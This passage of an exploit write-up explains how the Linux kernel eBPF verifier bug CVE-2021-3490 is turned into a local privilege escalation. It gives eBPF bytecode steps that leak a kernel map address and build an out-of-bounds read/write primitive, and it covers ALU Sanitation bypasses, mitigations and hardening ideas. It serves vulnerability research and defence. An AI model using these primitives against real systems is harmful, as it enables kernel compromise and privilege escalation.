BPF_MOV case separately. * If we return -EACCES, caller may want to try again treating pointer as a * scalar. So we only emit a diagnostic if !env->allow_ptr_leaks. */ static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env, struct bpf_insn *insn, const struct bpf_reg_state *ptr_reg, const struct bpf_reg_state *off_reg) { ... bool known = tnum_is_const(off_reg->var_off); s64 smin_val = off_reg->smin_value; smax_val = off_reg -> smax_value; smin_ptr = ptr_reg->smin_value; smax_ptr = ptr_reg-> smax_value; u64 umin_val = off_reg->umin_value; umax_val = off_reg-> umax_value; umin_ptr = ptr_reg->umin_value; umax_ptr = ptr_reg-> umax_value; ... if ((known && (smin_val != smax_val || umin_val != umax_val)) || smin_val > smax_val || umin_val > umax_val) { /* Taint dst register if offset had invalid bounds derived * from e.g. dead branches. */ __mark_reg_unknown(env, dst_reg); return 0; } ... } ``` The function [`adjust_ptr_min_max_vals`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L6672) shown above is called for arithmetic instructions involving a pointer. The register `off_reg` represents the offset scalar register being added to a pointer register. Notice that if the offset register has bounds such that  `umin_value > umax_value`, the function `__mark_reg_unknown` is called on the destination register. This function marks the register as containing an unknown scalar value. This means that if we have a register `EXPLOIT_REG` with bounds `umin_value > umax_value` and add it to a destination pointer register, the pointer register will be changed to a scalar. So, the verifier will no longer think that the register contains a pointer! This is notable because the verifier will now allow us to leak its value to user space by storing it in a eBPF map. First, we need to extend the invalid 32 bit bounds `u32_min_value, u32_max_value` to their 64 bit counterparts `umin_value, umax_value`. ``` // Zero extend the lower 32 bits of EXPLOIT_REG BPF_MOV32_REG(EXPLOIT_REG, EXPLOIT_REG) ``` Next, do any arithmetic operation with a map pointer stored in `OOB_MAP_REG`  with `EXPLOIT_REG` . Store its value in `STORE_MAP_REG`, which contains a pointer to another eBPF map that can be accessed from user space. ``` BPF_ALU64_REG(BPF_ADD, OOB_MAP_REG, EXPLOIT_REG) BPF_STX_MEM(BPF_DW, STORE_MAP_REG, OOB_MAP_REG, 0) ``` We have now leaked the kernel address of an eBPF map, which we will use later on in the exploit! _Note: this can also be done once we have established kernel read/write primitives. This is done by accessing the_ `private_data` _structure of the file from the_ `fd` _which we can get once we have the address of the thread’s_ `task_struct`. _However, this requires many more dependencies on hardcoded kernel offsets. I like to avoid this whenever possible, as it makes exploits more annoying to maintain. I thought this shortcut was a nice improvement._ ### Verifier Range Tracking Primitive Now, we create a primitive that will allow us to make out of bound read/writes. This will give us arbitrary read/write in the kernel. The idea is that we can create a register that the verifier believes has a value of `0`, but really has a value of `1` during runtime. First, trigger the bug, where we have `EXPLOIT_REG` with invalid 32 bit bounds `u32_max_value = 0 < u32_min_value = 1`. Next, add 1 to `EXPLOIT_REG`. ``` BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1) ``` In the case of immediate instructions, the immediate value is simply added to all the bounds, if adding the value will not cause an overflow. Thus, after adding `1` to `EXPLOIT_REG`, we have `u32_max_value = 1` and `u32_min_value = 2`, with `var_off = {0x100000000; value = 0x1}`. Now we need a register with an initially unknown value. Let’s call this register `UNKNOWN_VALUE_REG`. We create the register the same way as before, by loading a value from a eBPF map. The real runtime value of the register will be `0`. Then, we start to manipulate the bounds of the register by adding a conditional `jmp` statement: ``` BPF_JMP32_IMM(BPF_JLE, UNKOWN_VALUE_REG, 1, 1) BPF_EXIT_INSN() ``` The above conditional `jmp32` instruction will skip the exit instruction if the value of the lower 32 bits of the register is less than or equal to `1`. Because the actual value of the register will be `0`, the conditional statement will evaluate to `TRUE` and the exit instruction will be skipped. However, because the verifier does not know what the value will be, the 32 bit bounds of the register in the `TRUE` branch will be set to: `u32_min_value = 0` and `u32_max_value = 1`. Remember, the `jmp` was conditional on the lower 32 bits, so the upper 32 bits are still unknown. The lowest bit is also unknown, since it can be either `0` or `1`. So this register has `var_off = {mask = 0xFFFFFFFF00000001; value = 0x0}`. Now, let’s look at how these bounds are updated when two registers are added together: ``` BPF_ALU64_REG(BPF_ADD, EXPLOIT_REG, UNKOWN_VALUE_REG) ``` First, in [`adjust_scalar_min_max_vals`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L7479): ``` static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env, struct bpf_insn *insn, struct bpf_reg_state *dst_reg, struct bpf_reg_state src_reg) { ... switch (opcode) { case BPF_ADD: scalar32_min_max_add(dst_reg, &src;_reg); scalar_min_max_add(dst_reg, &src;_reg); dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off); break; ... } ``` The scalar add functions are called. Let’s look at the [32 bit case](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L6908): ``` static void scalar32_min_max_add(struct bpf_reg_state *dst_reg, struct bpf_reg_state *src_reg) { s32 smin_val = src_reg->s32_min_value; s32 smax_val = src_reg->s32_max_value; u32 umin_val = src_reg->u32_min_value; u32 umax_val = src_reg->u32_max_value; ... if (dst_reg->u32_min_value + umin_val < umin_val || dst_reg->u32_max_value + umax_val < umax_val) { dst_reg->u32_min_value = 0; dst_reg->u32_max_value = U32_MAX; } else { dst_reg->u32_min_value += umin_val; dst_reg->u32_max_value += umax_val; } } ``` If the addition operation doesn’t overflow either of the bounds, the bounds of the destination and source register are simply added together.  This will result in `EXPLOIT_REG` having new 32 bit bounds: `u32_min_value = 2, u32_max_value = 2`. Next, on line 11 in the above snippet of `adjust_scalar_min_max_vals`, `tnum_add` will be called and saved to `var_off` of the destination register. This function will return information from what is known after adding two `tnum`s together. Our registers are  - `EXPLOIT_REG`: `var_off = {0x100000000; value = 0x1}`  and  - `UNKOWN_REG:`  `var_off = {mask = 0xFFFFFFFF00000001; value = 0x0}` Because the upper 32 bits of `UNKNOWN_REG` are unknown, the upper 32 bits of the result will also be unknown. The same goes for the lowest bit - it could be either `0` or `1`. Since the lowest bit of `EXPLOIT_REG` is known to be `1`, the result of adding the two bits could be either `1` or `2`. This means that the second lowest bit is also unknown. The rest of the bits are known to be 0 in both the destination and source. This leaves `EXPLOIT_REG` with `var_off = {mask = 0xFFFFFFFF00000003; value = 0x0}`. Recall that we know that the verifier will now call three more functions that will affect the bounds of the destination register: `__update_reg_bounds`,  `__reg_deduce_bounds`, and `__reg_bound_offset`. In `__update_reg32_bounds`, where `var32_off.value` is `var_off` for the lower 32 bits of destination register `EXPLOIT_REG`: ``` reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value); reg->u32_max_value = min(reg->u32_max_value, (u32)(var32_off.value | var32_off.mask)); ``` Luckily, the bounds remain unchanged. Since `2 > 0`, the min bound remains the same. For the max bound, we are not comparing against `var32_off.value  = 0`, but `var_off.value | var32_off.mask = 3`. So, since `2 < 3`, the max bound also remains the same.  Similar logic applies to the signed bounds. Since the signed and the unsigned 32 bit bounds are all equal, they are not modified by `__reg32_deduce_bounds`. Last, in `__reg_bound_offset`, we have: ``` struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off), tnum_range(reg->u32_min_value, reg->u32_max_value)); ``` Where `var32_off` will be set equal to the lower 32 bit component of var_off for our destination register, `EXPLOIT_REG`. Recall that since `u32_min_value = u32_max_value`, `tnum_range` will return a `tnum` that has a known constant value of `2`, since the range only includes one integer value. Since the current `var_off` has a lower 32 bit `mask = 0x3`, `tnum_intersect` returns in the lowest three bits as known and equal to `2`! After all that, we have `EXPLOIT_REG` with bounds: `{u,s}32_min_value = {u,s}32_max_value = 2`, `var_off = {mask = 0xFFFFFFFF00000000; value = 0x2}`.  That is to say, a register with the lowest 32 bits are known and equal to `2`. During runtime though, the register is equal to `1`! All that’s left to do is zero extend the lower 32 bits of the register and do a simple `AND` operation: ``` BPF_MOV32_REG(EXPLOIT_REG, EXPLOIT_REG) BPF_ALU64_IMM(BPF_AND, EXPLOIT_REG, 1) ``` The verifier will now believe `EXPLOIT_REG = 0` because `2 & 1 = 0`, but it will be equal to `1`. We can now use this register to do OOB read/writes on eBPF map pointers. ### ALU Sanitation The strategy to bypass ALU Sanitation is excellently described in [this blog](https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification) by [Manfred Paul](https://twitter.com/_manfp). Here he details the LPE exploitation strategy he used in Pwn2Own 2020. Interestingly, this bypass was not needed at the time of the 2020 competition. When testing my exploit, I found that it was failing on some newer (but still vulnerable) Ubuntu kernels. The reason was because I was not  bypassing ALU Sanitation. During my initial research period I looked at many different public eBPF verifier exploits. Strangely, I didn’t see an ALU Sanitation bypass in any of them! After some investigation I discovered the reason. There was an integer underflow bug was when calculating the `alu_limit` in the verifier.  It was present until March 2021, and fixed in [this commit [17]](https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/patch/?id=10d2bb2e6b1d8c4576c56a748f697dbeb8388899). The bug is triggered when `alu_limit = 0`. An example case is doing a subtraction operation with a pointer at the start of a map. The sanitation instruction that was patched in: ``` *patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1); ``` Subtracting `1` from `0` results in `aux→alu_limit = 0xFFFFFFFF`. The strategy for eBPF exploits depends on modifying the `bpf_map` structure found in the memory chunk before the map’s memory. This is done by subtracting from a map pointer. ALU Sanitation was rendered completely useless by this bug against exploits of this type, and it went unnoticed even though many PoCs were publicly available. Of course, ALU Sanitation can be easily bypassed regardless.  The new implementation of ALU Sanitation is much more effective against these attacks, which I will go over in the Mitigations section. ### Finishing Up the LPE We have established the primitive, a register `EXPLOIT_REG` which the verifier believes to be `0` but is actually equal to `1` at runtime. The next steps are beautifully outlined in Manfred Paul’s [blog post](https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification). You can check out my [released PoC](https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490) to see the implementation. ## Demo <iframe width="100%" height="500" src="https://www.youtube.com/embed/EtQieYKtTY8" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe> ## Mitigations ### Unprivileged eBPF As mentioned in the introduction, running eBPF programs can be disallowed for unprivileged users by setting the `sysctl` knob  `kernel.unprivileged_bpf_disabled`. In May 2021, a new `kconfig` knob, `BPF_UNPRIV_DEFAULT_OFF`,  was introduced that sets the  `sysctl` knob  by default [ [7]](https://www.spinics.net/lists/netdev/msg740795.html). Enabling these configurations will protect against attacks by disallowing unprivileged users from \[ab\]using eBbPF.  However, this doesn’t mitigate the problem completely. A privileged user can still use the arbitrary kernel write in this exploit to bypass or disable kernel security modules like `SELinux`. ### ALU Sanitation As of April 2021, the implementation of ALU Sanitation has changed [ [15]](https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=7fedb63a8307dda0ec3b8969a3b233a1dd7ea8e0). The new implementation helps mitigate attacks like the one demonstrated in this blog. First, the way `alu_limit`  is calculated has changed. Now, instead of using the position of the pointer register to compute it, the offset register is used instead. For example, suppose we have some register with unsigned bounds `umax_value = 1`, `umin_value = 0`.  Then, the computed `alu_limit = 1`. This means that if the register is outside of those bounds during runtime, pointer arithmetic does not occur using that register. Additionally, ALU sanitation now patches pointer operation instructions if the scalar register is [known to be constant](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L12376). ``` bool off_is_imm = tnum_is_const(off_reg->var_off); alu_state |= off_is_imm ? BPF_ALU_IMMEDIATE : 0; isimm = aux->alu_state & BPF_ALU_IMMEDIATE; ... if (isimm) { *patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit); } else { // Patch alu_limit check instructions .... } ``` The above patch shows that the offset register is only checked against its `alu_limit` if is not known to be constant. If it is constant, the operation is patched with an immediate instruction using its _constant value._ Here’s an example. Suppose we have the following instruction: ``` BPF_ALU64_REG(BPF_ADD, BPF_REG_2, EXPLOIT_REG) ``` Here, `BPF_REG_2` contains a pointer to a map, and `EXPLOIT_REG` contains a register the verifier believes has a value of `0`, but the runtime value is `1`. The ALU Sanitation will apply a patch such that the effective instruction is: ``` BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0) ``` The intention is to mitigate against [speculative execution side-channel vulnerabilities](https://meltdownattack.com/) [ [16]](https://spectreattack.com/spectre.pdf), but it also serves to thwart attack methods such as the one presented in this blog. Sadly, this marks the end of an era for this elegant exploit primitive against the eBPF verifier. While this will make exploiting vulnerabilities like [CVE-2021-3490](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3490) harder,  I do not think this will be the end of exploitation with eBPF. I’ll discuss this further in the next section. ### Future Considerations Since the introduction of eBPF, there have been a number of privilege escalation attacks that leverage the technology. In addition to exploiting vulnerabilities in eBPF itself, it also represents a powerful primitive for exploiting other kernel vulnerabilities. While eBPF can be a great tool for developers, there’s still more work to be done to harden it further. Despite the new mitigations discussed in the ALU Sanitation section, exploits like the one demonstrated in the DoS exploitation section will still work. Patching dead code branches with exit instructions instead of jump backwards would prevent these type of attacks. An LPE exploit [writeup](https://www.qualys.com/2021/07/20/cve-2021-33909/sequoia-local-privilege-escalation-linux.txt) by Qualys published in July 2021 uses a memory corruption vulnerability to overwrite an eBPF program buffer, which contains the eBPF bytecode for a loaded program. Instead of fooling the verifier, the program is valid and passes verification. The buffer is overwritten after verification but before JIT compilation to achieve OOB read/write capabilities [ [8]](https://www.qualys.com/2021/07/20/cve-2021-33909/sequoia-local-privilege-escalation-linux.txt). As this exploit demonstrates, the window after validation and before JIT compilation is not small, and a race can be won to target a write. The eBPF program buffer memory should be marked read-only before verification, so that it can't be modified during verification, and stay read-only until JIT compilation.  This would prevent eBPF from being used as a powerful primitive when exploiting kernel memory corruption vulnerabilities. This was first suggested by [Brad Spengler](https://twitter.com/spendergrsec) in 2016 [ [9]](https://twitter.com/spendergrsec/status/1417487276075012109). ## Acknowledgements [Manfred Paul](https://twitter.com/_manfp), for the original vulnerability discovery, and the [excellent writeup](https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification) on exploiting [CVE-2020-8835](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8835), an eBPF verifier vulnerability. [Simon Scannell,](https://twitter.com/scannell_simon) for a great [eBPF fuzzing and exploitation writeup](https://scannell.io/posts/ebpf-fuzzing/). As well as an excellent [PoC](https://github.com/scannells/exploits/tree/master/CVE-2020-27194) exploiting [CVE-2020-27194](https://nvd.nist.gov/vuln/detail/CVE-2020-27194), another eBPF verifier vulnerability. I used this PoC to learn about eBPF bytecode and exploitation. [Andréa](https://twitter.com/and_zza), for her excellent work helping with graphics and the publishing of this blog post. ## References 1. https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/ 2. https://www.collabora.com/news-and-blog/blog/2019/04/15/an-ebpf-overview-part-2-machine-and-bytecode/ 3. https://www.spinics.net/lists/xdp-newbies/msg00185.html 4. https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification 5. https://blog.stackpath.com/bpf-hook-points-part-1/ 6. https://prototype-kernel.readthedocs.io/en/latest/bpf/ebpf_maps.html 7. https://www.spinics.net/lists/netdev/msg740795.html 8. https://www.qualys.com/2021/07/20/cve-2021-33909/sequoia-local-privilege-escalation-linux.txt 9. https://twitter.com/spendergrsec/status/1417487276075012109 10. https://github.com/qmonnet/rbpf 11. https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_x86-64-kernel.md 12. https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/bpf.h#L65 13. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3490 14. https://man7.org/linux/man-pages/man2/bpf.2.html 15. https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=7fedb63a8307dda0ec3b8969a3b233a1dd7ea8e0 16. https://meltdownattack.com/ 17. https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/patch/?id=10d2bb2e6b1d8c4576c56a748f697dbeb8388899 18. https://github.com/iovisor/bcc